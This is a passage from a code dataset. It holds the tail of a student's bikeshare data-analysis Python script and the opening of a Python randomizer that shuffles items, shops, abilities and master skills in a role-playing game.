'april', 'may', 'june']\ndays = ['sunday', 'monday', 'tuesday', 'wednesday', 'thursday', 'friday', 'saturday']\n\n\ndef load_city():\n \"\"\"\n Asks user to specify a city, month, and day to analyze.\n\n Returns:\n (str) city - name of the city to analyze\n (str) month - name of the month to filter by, or \"all\" to apply no month filter\n (str) day - name of the day of week to filter by, or \"all\" to apply no day filter\n \"\"\"\n city = input('\\nHi! here is some bikeshare data...\\n'\n '\\nPick your city Chicago (CH), New York (NY), Washington (WA)?\\n')\n city = city.lower()\n\n while True:\n if city == \"ny\":\n print(\"\\nWelcome to the Big Apple, enjoy the data\\n\")\n return place['apple']\n elif city == \"ch\":\n print(\"\\nWelcome to the Windy City, enjoy the data\\n\")\n return place['wind']\n elif city == \"wa\":\n print(\"\\nWelcome to the Land of Rain, enjoy the data\\n\")\n return place['rain']\n city = input(\"Select Chicago (CH), New York (NY), Washington (WA)\")\n\n\ndef load_time():\n # ask for the user time\n\n time = input('\\nSelect if you want to filter by month or day\\n')\n\n time = time.lower()\n\n if time == 'month':\n return ['month', load_month()]\n if time == 'day':\n return ['day', load_day()]\n else:\n print('\\nCan you try that again?')\n\n\ndef load_month():\n # get user input for month (all, january, february, ... , june)\n\n month = input('\\nWhich month? January, February, March, April, May, or June? Please type the full month name.\\n')\n\n month = month.lower()\n\n while True:\n if month == 'january':\n print(\"\\nHappy new year\\n\")\n return months[0]\n elif month == 'february':\n print(\"\\nHappy winter\\n\")\n return months[1]\n elif month == 'march':\n print(\"\\nHappy St. Pat\\n\")\n return months[2]\n elif month == 'april':\n print(\"\\nHappy April Showers\\n\")\n return months[3]\n elif month == 'may':\n print(\"\\nHappy May showers\\n\")\n return months[4]\n elif month == 'june':\n print(\"\\nHappy Summer\\n\")\n return months[5]\n month = input('Select January, February, March, April, May, or June? Please type the full month name.\\n')\n\n\ndef load_day():\n # get user input for day of week (all, monday, tuesday, ... sunday)\n\n day = input('\\nWhich day? Monday, Tuesday, Wednesday, Thursday, Friday, Saturday \\n')\n\n day = day.lower()\n\n while True:\n if day == 'sunday':\n print(\"\\nGood Sabbath\\n\")\n return days[0]\n elif day == 'monday':\n print(\"\\nHappy Monday\\n\")\n return days[1]\n elif day == 'tuesday':\n print(\"\\nHappy 2nd friday\\n\")\n return days[2]\n elif day == 'wednesday':\n print(\"\\nHappy Hump Day\\n\")\n return days[3]\n elif day == 'thursday':\n print(\"\\nTired Thursday\\n\")\n return days[4]\n elif day == 'friday':\n print(\"\\nIt's Friday\\n\")\n return days[5]\n elif day == 'saturday':\n print(\"\\nHappy Yard Day\\n\")\n return days[6]\n day = input('Select Monday, Tuesday, Wednesday, Thursday, Friday, Saturday \\n')\n\n\ndef load_data(city):\n \"\"\"\n Loads data for the specified city and filters by month and day if applicable.\n\n Args:\n (str) city - name of the city to analyze\n (str) month - name of the month to filter by, or \"all\" to apply no month filter\n (str) day - name of the day of week to filter by, or \"all\" to apply no day filter\n Returns:\n df - Pandas DataFrame containing city data filtered by month and day\n \"\"\"\n print('\\nLoading the data...\\n')\n df = pd.read_csv(city)\n\n df['Start Time'] = pd.to_datetime(df['Start Time'])\n\n df['day_of_week'] = df['Start Time'].dt.weekday_name\n df['month'] = df['Start Time'].dt.month\n df[\"day_of_month\"] = df[\"Start Time\"].dt.day\n\n return df\n\n\ndef time_stats(df):\n \"\"\"Displays statistics on the most frequent times of travel.\"\"\"\n\n print('\\nCalculating The Most Frequent Times of Travel...\\n')\n start_time = time.time()\n\n # display the most common month\n\n # display the most common day of week\n\n # convert the Start Time column to datetime\n df['Start Time'] = pd.to_datetime(df['Start Time'])\n\n # extract hour from the Start Time column to create an hour column\n df['hour'] = df['Start Time'].dt.hour\n\n # find the most popular hour\n popular_hour = df['hour'].mode()[0]\n\n\ndef station_stats(df):\n \"\"\"Displays statistics on the most popular stations and trip.\"\"\"\n\n print('\\nCalculating The Most Popular Stations and Trip...\\n')\n start_time = time.time()\n\n # display most commonly used start station\n print(\"\\n* What is the most popular start station?\\n\")\n start_station = df['Start Station'].value_counts().reset_index()['index'][0]\n print(start_station)\n\n # display most commonly used end station\n print(\"\\n* What is the most popular end station?\\n\")\n end_station = df['End Station'].value_counts().reset_index()['index'][0]\n print(end_station)\n\n return end_station\n\n # display most frequent combination of start station and end station trip\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-' * 40)\n\n\ndef trip_duration_stats(df):\n \"\"\"Displays statistics on the total and average trip duration.\"\"\"\n\n print('\\nCalculating Trip Duration...\\n')\n start_time = time.time()\n\n # display total travel time\n\n # display mean travel time\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-' * 40)\n\n\ndef user_stats(df):\n \"\"\"Displays statistics on bikeshare users.\"\"\"\n\n print('\\nCalculating User Stats...\\n')\n start_time = time.time()\n\n # Display counts of user types\n\n # Display counts of gender\n\n # Display earliest, most recent, and most common year of birth\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-' * 40)\n\n\ndef gender(df):\n gender_counts = df.groupby('Gender')['Gender'].count()\n return gender_counts\n\n\ndef main():\n while True:\n city = load_city()\n time = load_time()\n # month = load_month()\n # day = load_day()\n df = load_data(city)\n\n time_stats(df)\n station_stats(df)\n trip_duration_stats(df)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"ryanlence/Udacity","sub_path":"bikeshare/bikeshare.py","file_name":"bikeshare.py","file_ext":"py","file_size_in_byte":6738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"15164487015","text":"from randomtools.tablereader import (\n TableObject, addresses, get_activated_patches, get_open_file,\n mutate_normal, get_seed, get_global_label, tblpath,\n get_random_degree, get_difficulty, write_patch)\nfrom randomtools.utils import (\n classproperty, cached_property, utilrandom as random)\nfrom randomtools.interface import (\n run_interface, clean_and_write, finish_interface,\n get_activated_codes, get_flags, get_outfile)\nfrom collections import Counter, defaultdict\nfrom math import ceil\nfrom os import path\nfrom sys import argv\nfrom traceback import format_exc\n\n\nVERSION = '3.2'\nALL_OBJECTS = None\n\n\nclass NameMixin(TableObject):\n CHARSWAPS = {\n b'\\xff': b'\\x20',\n b'\\x8b': b'+',\n b'\\x3d': b'-',\n b'\\x8e': b'\\x27',\n b'\\x06': b'$NOCOLOR$',\n b'\\x01': b'\\n',\n b'\\x05\\x03': b'$BLUE$',\n b'\\x05\\x02': b'$RED$',\n b'>': b'.',\n }\n\n @classmethod\n def convert_to_str(self, s):\n for c in self.CHARSWAPS:\n s = s.replace(c, self.CHARSWAPS[c])\n return s.decode('ascii').rstrip('\\x00')\n\n @classmethod\n def convert_from_str(self, s):\n old_s = s\n s = s.encode('ascii')\n inverse_swaps = {}\n for (a, b) in self.CHARSWAPS.items():\n assert b not in inverse_swaps\n inverse_swaps[b] = a\n for c in inverse_swaps:\n s = s.replace(c, inverse_swaps[c])\n assert old_s == self.convert_to_str(s)\n return s\n\n def set_name(self, name):\n self.old_name\n name = self.convert_from_str(name)\n attr = self._name_attr\n length = [l for (a, l, _) in self.specsattrs if a == attr][0]\n if len(name) > length:\n print('WARNING: Name %s too long. Truncating.' % name)\n name = name[:length]\n while len(name) < length:\n name += b'\\xff'\n setattr(self, attr, name)\n assert len(getattr(self, attr)) == len(self.old_data[attr])\n\n @property\n def name(self):\n old_name = self.old_name\n if getattr(self, self._name_attr) == self.old_data[self._name_attr]:\n return old_name\n else:\n name = getattr(self, self._name_attr)\n return self.convert_to_str(name)\n\n @cached_property\n def old_name(self):\n for attr in self.old_data:\n if attr.endswith('_name'):\n self._name_attr = attr\n name = self.old_data[attr]\n break\n return self.convert_to_str(name)\n\n\nclass AcquireItemMixin(TableObject):\n flag = 't'\n custom_random_enable = 't'\n\n @classmethod\n def get_item_by_type_index(self, item_type, item_index):\n if item_type in ItemMixin.ITEM_TYPE_MAP:\n obj = ItemMixin.ITEM_TYPE_MAP[item_type]\n return obj.get(item_index)\n return None\n\n @property\n def item(self):\n return self.get_item_by_type_index(self.item_type, self.item_index)\n\n @property\n def old_item(self):\n return self.get_item_by_type_index(self.old_data['item_type'],\n self.old_data['item_index'])\n\n @property\n def name(self):\n item = self.item\n if item is None:\n return 'NONE'\n return item.name\n\n def mutate(self, unique=False):\n item = self.item\n\n if not hasattr(self.__class__, '_DONE_ITEMS'):\n self.__class__._DONE_ITEMS = set()\n\n for _ in range(100):\n if item is None:\n candidates = [i for i in ItemMixin.ranked_shuffle_items\n if 0 <= i.old_data['price'] <= self.value]\n item = candidates[-1]\n\n if item.rank < 0 or not item.intershuffle_valid:\n new_item = item\n break\n\n new_item = item.get_similar(random_degree=self.random_degree)\n if unique and new_item in self.__class__._DONE_ITEMS:\n continue\n self.__class__._DONE_ITEMS.add(new_item)\n break\n\n self.item_index = new_item.index\n self.item_type = ItemMixin.item_type_from_item(new_item)\n\n\nclass ItemMixin(NameMixin):\n flag = 's'\n mutate_attributes = {'price': (1, 65000)}\n\n @property\n def magic_mutate_bit_attributes(self):\n if (hasattr(self, 'equipability')\n and EquipmentObject.flag in get_flags()\n and not isinstance(self, WeaponObject)):\n return {'equipability': 0x77}\n return {}\n\n @classproperty\n def ITEM_TYPE_MAP(self):\n return {\n 0: ItemObject,\n 1: WeaponObject,\n 2: ArmorObject,\n 3: AccessoryObject,\n 4: KeyItemObject,\n }\n\n @classmethod\n def item_type_from_item(self, item):\n for k in sorted(ItemMixin.ITEM_TYPE_MAP):\n if isinstance(item, ItemMixin.ITEM_TYPE_MAP[k]):\n return k\n\n @classproperty\n def shuffle_items(self):\n if hasattr(self, '_shuffle_items'):\n return self._shuffle_items\n\n shuffle_items = (\n ItemObject.every +\n WeaponObject.every +\n ArmorObject.every +\n AccessoryObject.every\n )\n shuffle_items = [i for i in shuffle_items if i.index > 0\n and i.intershuffle_valid]\n self._shuffle_items = shuffle_items\n\n return self.shuffle_items\n\n @classproperty\n def ranked_shuffle_items(self):\n if hasattr(self, '_ranked_shuffle_items'):\n return self._ranked_shuffle_items\n\n self._ranked_shuffle_items = sorted(\n self.shuffle_items, key=lambda i: (i.rank, i.signature, i.name))\n return self.ranked_shuffle_items\n\n @property\n def rank(self):\n if hasattr(self, '_rank'):\n return self._rank\n\n sorted_items = sorted(\n self.shuffle_items, key=lambda i: (\n i.old_data['price'], i.signature, i.name))\n\n max_index = len(sorted_items)-1\n for (n, i) in enumerate(sorted_items):\n i._global_rank = n / max_index\n\n for obj_class in [ItemObject, WeaponObject,\n ArmorObject, AccessoryObject]:\n for i in obj_class.every:\n i._rank = -1\n\n sorted_local = [i for i in sorted_items\n if isinstance(i, obj_class)]\n max_index = len(sorted_local)-1\n for (n, i) in enumerate(sorted_local):\n i._local_rank = n / max_index\n\n for i in sorted_items:\n i._rank = (i._local_rank + i._global_rank) / 2\n\n sorted_items = sorted(\n self.shuffle_items, key=lambda i: (i._rank, i.signature, i.name))\n\n max_index = len(sorted_items)-1\n for n, i in enumerate(sorted_items):\n i._rank = n / max_index\n\n return self.rank\n\n def get_similar(self, candidates=None, override_outsider=False,\n random_degree=None):\n if candidates is None:\n candidates = ItemMixin.ranked_shuffle_items\n new_item = super().get_similar(candidates=candidates,\n override_outsider=override_outsider,\n random_degree=random_degree)\n return new_item\n\n def magic_mutate_bits(self):\n return\n\n def mutate_equipability(self):\n super().magic_mutate_bits(random_degree=EquipmentObject.random_degree)\n names = {'ryu': 0x01,\n 'nina': 0x02,\n 'garr': 0x04,\n 'rei': 0x10,\n 'momo': 0x20,\n 'peco': 0x40}\n sorted_names = sorted(names)\n if not hasattr(type(self), '_equipment_map'):\n if isinstance(self, WeaponObject):\n shuffled_names = list(sorted_names)\n random.shuffle(shuffled_names)\n equipment_map = dict(zip(sorted_names, shuffled_names))\n else:\n equipment_map = {}\n for n in sorted_names:\n equipment_map[n] = random.choice(sorted_names)\n type(self)._equipment_map = equipment_map\n\n value = self.equipability\n for n in sorted_names:\n mapped_from = type(self)._equipment_map[n]\n bitmask = names[mapped_from]\n truth = value & bitmask\n self.set_bit(n, truth)\n self.set_bit('teepo', True)\n\n def preclean(self):\n if hasattr(self, 'equipability') and self.old_data['equipability'] > 0:\n characters = ['ryu', 'nina', 'garr', 'rei', 'momo', 'peco']\n if not any(self.get_bit(c) for c in characters):\n c = random.choice(characters)\n self.set_bit(c, True)\n\n for attr in ['willpower', 'base_willpower', 'current_willpower']:\n setattr(self, attr, 0)\n\n def cleanup(self):\n if hasattr(self, 'equipability'):\n if EquipmentObject.flag not in get_flags():\n assert self.equipability == self.old_data['equipability']\n if self.old_data['equipability'] == 0:\n self.equipability = 0\n elif 'equipanything' in get_activated_codes():\n self.equipability = 0xff\n\n if self.price >= 100:\n self.price = int(float('%.2g' % (self.price*2)) / 2)\n else:\n self.price = int(float('%.1g' % (self.price*2)) / 2)\n\n\nclass DupeMixin:\n @cached_property\n def fingerprint(self):\n return str(sorted(self.old_data.items()))\n\n @cached_property\n def canonical_relative(self):\n for o in sorted(self.every, key=lambda oo: oo.index):\n if (isinstance(self, MonsterObject) and o is self and\n self.monster_name != self.old_data['monster_name']):\n continue\n if o.index >= self.index:\n return self\n if o.fingerprint == self.fingerprint:\n assert o.is_canonical\n return o\n\n @cached_property\n def is_canonical(self):\n return self.canonical_relative is self\n\n def cleanup(self):\n if hasattr(self, 'memory') and self.memory == 0xff:\n return\n if self.canonical_relative is not self:\n for attr in self.old_data:\n setattr(self, attr, getattr(self.canonical_relative, attr))\n\n\nclass EquipmentObject(TableObject):\n flag = 'q'\n flag_description = 'equippable items'\n custom_random_enable = 'q'\n\n def mutate(self):\n assert self.index == 0\n for i in ItemMixin.shuffle_items:\n if hasattr(i, 'equipability'):\n i.reseed('equip')\n i.mutate_equipability()\n\n\nclass MonsterAbilityObject(TableObject):\n flag = 'n'\n flag_description = 'enemy abilities'\n custom_random_enable = 'n'\n\n def mutate(self):\n for m in MonsterObject.every:\n if m.is_boss or not m.is_canonical:\n continue\n m.mutate_skills()\n\n\nclass FairyGiftObject(AcquireItemMixin): pass\nclass FairyExploreObject(AcquireItemMixin): pass\nclass FairyPrizeObject(AcquireItemMixin): pass\n\n\nclass FairyObject(DupeMixin, NameMixin):\n flag = 'c'\n\n def randomize(self):\n new_stats = []\n for i in range(4):\n f = random.choice(FairyObject.every)\n new_stats.append(f.old_data['stats'][i])\n self.stats = new_stats\n assert len(self.stats) == len(self.old_data['stats'])\n\n\nclass ItemObject(ItemMixin):\n @property\n def intershuffle_valid(self):\n WHITELIST = []\n return self.index < 0x4e or self.index in WHITELIST\n\n\nclass KeyItemObject(NameMixin): pass\nclass WeaponObject(ItemMixin):\n def cleanup(self):\n super().cleanup()\n if 'HE Shells' in self.name:\n self.set_bit('momo', True)\n\n\nclass ArmorObject(ItemMixin): pass\nclass AccessoryObject(ItemMixin): pass\n\n\nclass AbilityObject(NameMixin):\n flag = 'a'\n flag_description = 'abilities'\n custom_random_enable = 'a'\n\n HEALING_SKILL = 0\n ASSIST_SKILL = 1\n ATTACK_SKILL = 2\n EXAMINE_SKILL = 3\n\n BANNED_SKILLS = ['Head Cracker', 'Nue Stomp']\n LEVELUP_BANNED_SKILLS = ['Backhand']\n\n @property\n def intershuffle_valid(self):\n if self.rank < 0:\n return False\n return (self._levelup_rank is None\n or self.get_bit('examinable'))\n\n @property\n def is_spare_levelup_skill(self):\n if len([a for a in self.every if a.old_name == self.old_name]) == 1:\n return False\n return not self.intershuffle_valid\n\n @property\n def is_boss_skill(self):\n if hasattr(self, '_is_boss_skill'):\n return self._is_boss_skill\n\n for a in AbilityObject.every:\n a._is_boss_skill = False\n\n for m in MonsterObject.every:\n if m.is_boss:\n for a in m.abilities:\n a._is_boss_skill = True\n\n for m in MonsterObject.every:\n if not m.is_boss:\n for a in m.abilities:\n a._is_boss_skill = False\n\n return self.is_boss_skill\n\n @cached_property\n def examine_alt(self):\n if self.name == 'Noting':\n return None\n selves = [a for a in self.every if a.old_name == self.old_name]\n if len(selves) == 1:\n return self\n examinable = [a for a in selves if a.get_bit('examinable')]\n assert len(examinable) <= 1\n if examinable:\n return examinable[0]\n return None\n\n @cached_property\n def levelup_alt(self):\n if self.name == 'Noting':\n return None\n selves = [a for a in self.every if a.old_name == self.old_name]\n if len(selves) == 1:\n return self\n unexaminable = [a for a in selves if not a.get_bit('examinable')]\n if len(unexaminable) > 1:\n return sorted(unexaminable, key=lambda a: a.index)[0]\n if unexaminable:\n return unexaminable[0]\n return None\n\n @property\n def is_offense(self):\n return self.get_bit('default_target_enemy')\n\n @cached_property\n def is_utility(self):\n elements = ['fire', 'ice', 'lightning', 'earth', 'wind', 'holy']\n for e in elements:\n if self.get_bit(e):\n return False\n return self.get_bit('psionic') or self.get_bit('status')\n\n def calculate_skill_type(self):\n if self.is_utility:\n skill_type = self.ASSIST_SKILL\n elif self.is_offense:\n skill_type = self.ATTACK_SKILL\n else:\n skill_type = self.HEALING_SKILL\n return skill_type\n\n def reset_skill_type(self, skill_type=None):\n if skill_type is None:\n skill_type = self.calculate_skill_type()\n\n self.skill_type &= 0xFC\n self.skill_type |= skill_type\n\n @property\n def rank(self):\n if hasattr(self, '_rank'):\n return self._rank\n\n for a in AbilityObject.every:\n a._monster_rank = None\n a._levelup_rank = None\n a._master_rank = None\n\n for m in MonsterObject.ranked:\n if m.rank >= 0:\n for a in m.abilities:\n a._monster_rank = a._monster_rank or m.rank\n a._monster_rank = min(a._monster_rank, m.rank)\n\n max_level = max([l.level for l in LevelObject.every if l.ability > 0])\n for l in LevelObject.every:\n if l.ability > 0:\n a = AbilityObject.get(l.ability)\n a._levelup_rank = a._levelup_rank or l.level / max_level\n a._levelup_rank = min(a._levelup_rank, l.level / max_level)\n\n for bs in BaseStatsObject.every:\n for a in bs.all_abilities:\n a._levelup_rank = a._levelup_rank or bs.level / max_level\n a._levelup_rank = min(a._levelup_rank, bs.level / max_level)\n\n max_level = (max([max(ms.levels) for ms in MasterSkillsObject.every])\n + 1)\n for ms in MasterSkillsObject.every:\n for level, skill in zip(ms.levels, ms.skills):\n skill._master_rank = skill._master_rank or level / max_level\n skill._master_rank = min(skill._master_rank, level / max_level)\n\n name_ranks = {}\n for a in AbilityObject.every:\n ranks = []\n for attr in ['monster', 'levelup', 'master']:\n rank = getattr(a, '_%s_rank' % attr)\n if rank is not None:\n ranks.append(rank)\n\n if a.name and ranks:\n rank_value = sum(ranks) / len(ranks)\n if a.name not in name_ranks:\n name_ranks[a.name] = set([])\n name_ranks[a.name].add(rank_value)\n\n for name in ['Nothing', 'Noting']:\n if name in name_ranks:\n del(name_ranks[name])\n\n for a in AbilityObject.every:\n if a.old_name in AbilityObject.BANNED_SKILLS:\n a._rank = -1\n continue\n if a.name in name_ranks:\n ranks = name_ranks[a.name]\n a._rank = sum(ranks) / len(ranks)\n else:\n a._rank = -1\n\n return self.rank\n\n def cleanup(self):\n if self.old_name in self.BANNED_SKILLS:\n self.set_bit('examinable', False)\n\n if hasattr(self, '_rename'):\n self.set_name(self._rename)\n\n\nclass LevelObject(TableObject):\n def __repr__(self):\n s = '{0:5} {1:0>2}'.format(self.charname, self.level)\n for attr in ['hp', 'ap', 'pwr', 'dfn', 'agi', 'int']:\n value = getattr(self, attr)\n s += ' | {0}: {1}'.format(attr, value)\n return s\n\n @property\n def level(self):\n return (self.index % 99) + 1\n\n @property\n def charname(self):\n return BaseStatsObject.get(self.index // 99).name\n\n def set_stat(self, stat, value):\n for attr in self.old_data:\n old_value = getattr(self, attr)\n if attr == stat:\n setattr(self, attr, value)\n elif attr.startswith(stat):\n old_value &= 0xf\n old_value |= (value << 4)\n elif attr.endswith(stat):\n old_value &= 0xf0\n old_value |= value\n return self.old_data[attr] & 0xf\n\n def get_old_stat(self, stat):\n for attr in self.old_data:\n if attr == stat:\n return self.old_data[attr]\n elif attr.startswith(stat):\n return self.old_data[attr] >> 4\n elif attr.endswith(stat):\n return self.old_data[attr] & 0xf\n\n @property\n def pwr(self):\n return self.pwr_dfn >> 4\n\n @property\n def dfn(self):\n return self.pwr_dfn & 0xf\n\n @property\n def agi(self):\n return self.agi_int >> 4\n\n @property\n def int(self):\n return self.agi_int & 0xf\n\n\nclass ShopObject(TableObject):\n flag = 's'\n flag_description = 'shops and trades'\n custom_random_enable = 's'\n\n def __repr__(self):\n s = 'SHOP {0:0>2X} {1}\\n'.format(self.index, self.name)\n for item in self.items:\n if item.name != 'Nothing':\n s += ' {0:12} {1:>5}\\n'.format(item.name, item.price)\n return s.strip()\n\n @property\n def name(self):\n if hasattr(self, '_name'):\n return self._name\n\n index_names = {}\n with open(path.join(tblpath, 'names_shops.txt')) as f:\n for (i, line) in enumerate(f.readlines()):\n line = line.strip()\n index_names[i] = line\n\n for s in ShopObject.every:\n s._name = index_names[s.index].upper()\n\n return self.name\n\n @property\n def comparison(self):\n if self.items == self.old_items:\n return self.__repr__()\n\n s = 'SHOP {0:0>2X} {1:0>2X}\\n'.format(self.index, self.unknown)\n for old_item, new_item in zip(self.old_items, self.items):\n s += ' {0:12} {1:>5} -> {2:12} {3:>5}\\n'.format(\n old_item.name, old_item.price, new_item.name, new_item.price)\n return s.strip()\n\n @property\n def item_types(self):\n return [v & 0xff for v in self.item_type_item_indexes]\n\n @property\n def item_indexes(self):\n return [v >> 8 for v in self.item_type_item_indexes]\n\n @classmethod\n def items_from_indexes(self, item_types, item_indexes):\n items = []\n for item_type, item_index in zip(item_types, item_indexes):\n obj = ItemMixin.ITEM_TYPE_MAP[item_type]\n item = obj.get(item_index)\n items.append(item)\n return items\n\n @property\n def items(self):\n return self.items_from_indexes(self.item_types, self.item_indexes)\n\n @property\n def old_items(self):\n item_types = [v & 0xff for v in\n self.old_data['item_type_item_indexes']]\n item_indexes = [v >> 8 for v in\n self.old_data['item_type_item_indexes']]\n return self.items_from_indexes(item_types, item_indexes)\n\n def item_type_from_item(self, item):\n return ItemMixin.item_type_from_item(item)\n\n def set_items(self, items):\n self.item_type_item_indexes = [\n (i.index << 8) | self.item_type_from_item(i) for i in items]\n assert self.items == items\n\n @classproperty\n def item_pools(self):\n if hasattr(ShopObject, '_item_pools'):\n return ShopObject._item_pools\n\n item_pools = {}\n for i in (ItemObject.every + WeaponObject.every +\n ArmorObject.every + AccessoryObject.every):\n item_pools[i] = []\n for s in ShopObject.every:\n old_items = [i for i in s.old_items if i.index > 0]\n if i in old_items:\n item_pools[i] += old_items\n ShopObject._item_pools = item_pools\n\n return ShopObject.item_pools\n\n def mutate(self):\n random_degree = self.random_degree ** 0.5\n\n valid_items = [i for i in self.old_items if i.index > 0]\n candidates = []\n for i in valid_items:\n candidates += ShopObject.item_pools[i]\n candidates = sorted(candidates, key=lambda i: i.rank)\n\n duplicates_allowed = len(set(valid_items)) != len(valid_items)\n new_items = []\n for i in self.old_items:\n if i.index == 0:\n continue\n\n if (not isinstance(i, ItemObject) and\n random.random() < random_degree):\n my_candidates = [c for c in ItemMixin.ranked_shuffle_items\n if type(c) == type(i)]\n else:\n my_candidates = list(candidates)\n\n index = my_candidates.index(i)\n my_candidates[index] = None\n my_candidates = [c for c in my_candidates if c is not i]\n if not duplicates_allowed:\n my_candidates = [c for c in my_candidates\n if c not in new_items]\n index = my_candidates.index(None)\n my_candidates[index] = i\n assert my_candidates.count(i) == 1\n\n index = my_candidates.index(i)\n if i in new_items:\n my_candidates.remove(i)\n if my_candidates:\n max_index = len(my_candidates)-1\n index = min(max(index, 0), max_index)\n index = mutate_normal(index, 0, max_index,\n random_degree=random_degree)\n new_item = my_candidates[index]\n else:\n new_item = i\n new_items.append(new_item)\n\n self.set_items(new_items)\n\n def preclean(self):\n if self.index == 0xd:\n flame_chrysm = AcquireItemMixin.get_item_by_type_index(1, 0x47)\n assert 'Flame Chrysm' in flame_chrysm.name\n if flame_chrysm not in self.items:\n new_items = list(self.items)\n if (len(new_items) >=\n len(self.old_data['item_type_item_indexes'])):\n to_remove = random.choice(new_items)\n new_items.remove(to_remove)\n new_items = [flame_chrysm] + new_items\n self.set_items(new_items)\n\n def cleanup(self):\n sorted_items = sorted(\n self.items, key=lambda i: (\n self.item_type_from_item(i),\n i.equip_type if isinstance(i, ArmorObject) else 0,\n i.name))\n sorted_items = [i for i in sorted_items if i.index > 0]\n if not 0x11 <= self.index <= 0x16: # faerie shops\n self.set_items(sorted_items)\n\n self.num_items = len([i for i in self.item_type_item_indexes if i])\n\n while len(self.items) < len(self.old_data['item_type_item_indexes']):\n self.item_type_item_indexes.append(0)\n\n\nclass MasterSkillsObject(TableObject):\n flag = 'm'\n flag_description = 'masters'\n custom_random_enable = 'm'\n\n RESTRICTED_NAMES = ['Bais', 'Lang', 'Lee', 'Wynn']\n\n @classproperty\n def after_order(self):\n return [BaseStatsObject]\n\n def __repr__(self):\n if self.name in self.RESTRICTED_NAMES:\n return ''\n\n s = ''\n for level, skill in zip(self.levels, self.skills):\n s += 'LV{0:0>2} {1}\\n'.format(level, skill.name)\n return s.strip()\n\n @property\n def levels(self):\n levels = [skill_level & 0xff for skill_level in self.skill_levels\n if skill_level >> 8 != 0xff]\n assert all([1 <= level <= 98 for level in levels])\n return levels\n\n @property\n def skills(self):\n return [AbilityObject.get(skill_level >> 8)\n for skill_level in self.skill_levels\n if skill_level >> 8 != 0xff]\n\n @property\n def name(self):\n return MasterStatsObject.names[self.index]\n\n def set_skills(self, skills, levels):\n skill_indexes = [a.index for a in skills]\n temp_levels = sorted(levels)\n assert len(skill_indexes) == len(levels)\n while len(skill_indexes) < len(self.old_data['skill_levels']):\n skill_indexes.append(0xFF)\n temp_levels.append(0x63)\n self.skill_levels = [\n l | (i << 8) for (i, l) in zip(skill_indexes, temp_levels)]\n assert self.skills == skills\n assert self.levels == levels\n\n def mutate(self):\n if AbilityObject.flag not in get_flags():\n return\n if self.name in self.RESTRICTED_NAMES:\n return\n\n banned_skills = {\n AbilityObject.get(l.ability) for l in LevelObject.every\n if l.ability > 0\n and l.charname not in BaseStatsObject.RESTRICTED_NAMES}\n candidates = [a for a in AbilityObject.every if a.rank >= 0\n and a not in banned_skills and a is a.examine_alt]\n\n target_nums = [len(mso.skills) for mso in self.every\n if mso.name not in self.RESTRICTED_NAMES]\n target_num_skills = random.choice(target_nums)\n new_skills = []\n for _ in range(1000):\n if len(new_skills) >= target_num_skills:\n break\n base = random.choice(self.skills)\n assert base.intershuffle_valid\n new_skill = base.get_similar(candidates=candidates,\n override_outsider=True,\n random_degree=self.random_degree)\n assert new_skill is new_skill.examine_alt\n if new_skill not in new_skills:\n new_skills.append(new_skill)\n else:\n target_num_skills = len(new_skills)\n new_levels = random.choice([mso.levels for mso in self.every\n if len(mso.levels) == target_num_skills])\n self.set_skills(new_skills, new_levels)\n\n @classmethod\n def full_preclean(cls):\n backhand = [a for a in AbilityObject.every\n if a.old_name == 'Backhand'][0]\n valid_backhand_masters = [\n mso for mso in MasterSkillsObject.every if mso.name not in\n MasterSkillsObject.RESTRICTED_NAMES + ['Hondara']]\n existing = [mso for mso in valid_backhand_masters\n if backhand in mso.skills]\n if not existing:\n candidates = [mso for mso in valid_backhand_masters\n if len(mso.skills) < 6]\n chosen = random.choice(candidates)\n skills, levels = chosen.skills, chosen.levels\n candidates = [l for l in range(min(levels), max(levels))\n if l not in levels]\n if not candidates:\n candidates = [max(levels)+1]\n levels = sorted(levels + [random.choice(candidates)])\n max_index = len(skills)\n skills.insert(random.randint(0, max_index), backhand)\n chosen.set_skills(skills, levels)\n\n super().full_preclean()\n\n def preclean(self):\n if self.name in self.RESTRICTED_NAMES:\n return\n\n for skill in self.skills:\n skill.set_bit('examinable', True)\n skill.reset_skill_type(AbilityObject.EXAMINE_SKILL)\n\n def cleanup(self):\n if self.name in self.RESTRICTED_NAMES:\n for attr in self.old_data:\n setattr(self, attr, self.old_data[attr])\n return\n\n for skill in self.skills:\n assert skill.get_bit('examinable')\n assert skill.skill_type & 3 == AbilityObject.EXAMINE_SKILL\n\n\nclass MasterStatsObject(TableObject):\n flag = 'm'\n custom_random_enable = 'm'\n names = [\n 'Bunyan', 'Mygas', 'Yggdrasil', \"D'lonzo\", 'Fahl',\n 'Durandal', 'Giotto', 'Hondara', 'Emitai', 'Deis',\n 'Hachio', 'Bais', 'Lang', 'Lee', 'Wynn',\n 'Ladon', 'Meryleep',\n ]\n\n def __repr__(self):\n s = 'MASTER {0:0>2X} {1}\\n'.format(self.index, self.name)\n for attr, _, _ in self.specsattrs:\n value = getattr(self, attr)\n if value >= 0x80:\n value = value - 0x100\n if value > 0:\n value = '+%s' % value\n s += '{0}: {1:2} | '.format(attr.upper(), value)\n s = s.strip().rstrip('|').strip()\n s = '{0}\\n{1}'.format(s, MasterSkillsObject.get(self.index))\n return s.strip()\n\n def read_data(self, filename=None, pointer=None):\n super().read_data(filename=filename, pointer=pointer)\n for attr in self.old_data:\n value = getattr(self, attr)\n assert self.old_data[attr] == value\n if value >= 0x80:\n value = value - 0x100\n setattr(self, attr, value)\n self.old_data[attr] = value\n\n @property\n def name(self):\n return self.names[self.index]\n\n @property\n def rating(self):\n return sum(v for v in self.old_data.values())\n\n def randomize(self):\n ratings = [mso.rating for mso in self.every]\n target_rating = random.choice(ratings)\n swappable_stats = [('hp', 'ap'), ('pwr', 'dfn', 'agi', 'int')]\n stat_pools = defaultdict(list)\n for attr in self.old_data:\n swappable = [s for s in swappable_stats if attr in s][0]\n for stat in swappable:\n for mso in self.every:\n stat_pools[attr].append(mso.old_data[stat])\n stat_pools[attr] = sorted(stat_pools[attr])\n setattr(self, attr, random.choice(stat_pools[attr]))\n\n while True:\n rating = sum(getattr(self, attr) for attr in self.old_data)\n if rating == target_rating:\n break\n\n attr = random.choice(sorted(self.old_data))\n setattr(self, attr, random.choice(stat_pools[attr]))\n\n def cleanup(self):\n for attr in 